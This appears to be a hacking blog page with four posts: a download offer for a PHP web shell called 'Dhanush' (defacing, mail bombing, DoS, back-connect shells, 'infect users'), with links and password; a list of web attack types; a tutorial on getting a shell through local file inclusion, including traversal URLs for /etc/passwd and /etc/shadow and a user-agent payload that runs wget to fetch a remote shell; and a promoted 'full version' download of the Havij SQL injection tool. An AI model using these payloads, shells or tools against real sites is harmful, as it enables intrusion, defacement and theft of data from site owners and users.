Dhanush Shell (Download)

Dhanush Shell

Arjun has developed a new version of I-47 Shell with some new & interesting features and some bugs fixed reported by some users. He has renamed it to "Dhanush".

Features :-

- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, python, php
- Bind Shell with perl ,C
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Security & OS information
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Bypassers
- Script Locator
- TCP / UDP Scanner
- Bruteforcer

New Features :-

- One click deface (Optional)
- Set 404 deface page
- Malware attack (Infect Users)
- Cpanel,Telnet & FTP Cracker
- Improved forum defacer
- Available in 4 different GUIs
- Removed some bugs with some small features introduced

- Available in Hindi Version too

Quote:

Username : Dhanush

Password : Dhanush

Download Links

http://www.mediafire.com/?z42somsoj4pj044

http://www.uploadcore.com/41q0yks5a4ou

Posted By आर्यावर्त11:34 PM

0

Continue Reading

All Web Applications Attacking Methods

This list is not full list, if there are some attacks I missed, please comment below.


This list below fits in category Parameter manipulation

• Arbitary File Deletion
• Code Execution
• Cookie Manipulation ( meta http-equiv & crlf injection )
• CRLF Injection ( HTTP response splitting )
• Cross Frame Scripting ( XFS )
• Cross-Site Scripting ( XSS )
• Directory traversal
• Email Injection
• File inclusion
• Full path disclosure
• LDAP Injection
• PHP code injection
• PHP curl_exec() url is controlled by user
• PHP invalid data type error message
• PHP preg_replace used on user input
• PHP unserialize() used on user input
• Remote XSL inclusion
• Script source code disclosure
• Server-Side Includes (SSI) Injection
• SQL injection
• URL redirection
• XPath Injection vulnerability
• EXIF

This list below fits in category MultiRequest parameter manipulation

• Blind SQL injection (timing)
• Blind SQL/XPath injection (many types)

This list below fits in category File checks

• 8.3 DOS filename source code disclosure
• Search for Backup files
• Cross Site Scripting in URI
• PHP super-globals-overwrite
• Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )

This list below fits in category Directory checks

• Cross Site Scripting in path
• Cross Site Scripting in Referer
• Directory permissions ( mostly for IIS )
• HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
• Possible sensitive files
• Possible sensitive files
• ******* fixation ( j*******id & PHPSESSID ******* fixation )
• Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
• WebDAV ( very vulnerable component of IIS servers )

This list below fits in category Text Search Disclosure

• Application error message
• Check for common files
• Directory Listing
• Email address found
• Local path disclosure
• Possible sensitive files
• Microsoft Office possible sensitive information
• Possible internal IP address disclosure
• Possible server path disclosure ( Unix and Windows )
• Possible username or password disclosure
• Sensitive data not encrypted
• Source code disclosure
• Trojan shell ( r57,c99,crystal shell etc )
• ( IF ANY )Wordpress database credentials disclosure

This list below fits in category File Uploads

• Unrestricted File Upload

This list below fits in category Authentication

• Microsoft IIS WebDAV Authentication Bypass
• SQL injection in the authentication header
• Weak Password
• GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )

This list below fits in category Web Services - Parameter manipulation & with multirequest

• Application Error Message ( testing with empty, NULL, negative, big hex etc )
• Code Execution
• SQL Injection
• XPath Injection
• Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
• Stored Cross-Site Scripting ( XSS )
• Cross-Site Request Forgery ( CSRF )

Posted By आर्यावर्त7:14 PM

0

Continue Reading

Hacking Websites via LFI (Simple, Short and easy)

 1. Introduction

 2. /proc/self/environ

 3. PHP injection

 4. Accessing the shell

1. Introduction

Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.

Here is the example of a code that is vulnerable to LFI:

<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>

It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.

Here is a example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)

2. proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/sef/environ

If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.

If you get only a blank page, it isn't vulnerable.

3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.

Our command will be executed.

4. Accessing the shell

To check if the command got executed, we will enter something like this:
http://www.google.ca/gonullyourself.php

If our shell is there, the command was successfully executed.

Easy :) Isn't it?

Posted By आर्यावर्त10:36 PM

0

Continue Reading

Havij 1.16 Pro Full Version Download

Havij is an automated SQL Injection tool that helps penetration testers to find an exploit SQL Injection Vulnerabilities on a web page...

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system...

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij...

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users...

How to run Havij :-

While running make sure u run it as admin, if u not do that this will give the error...

Download link :-

Mediafire Link

Uploadcore Link

Posted By आर्यावर्त11:30 PM

1

Continue Reading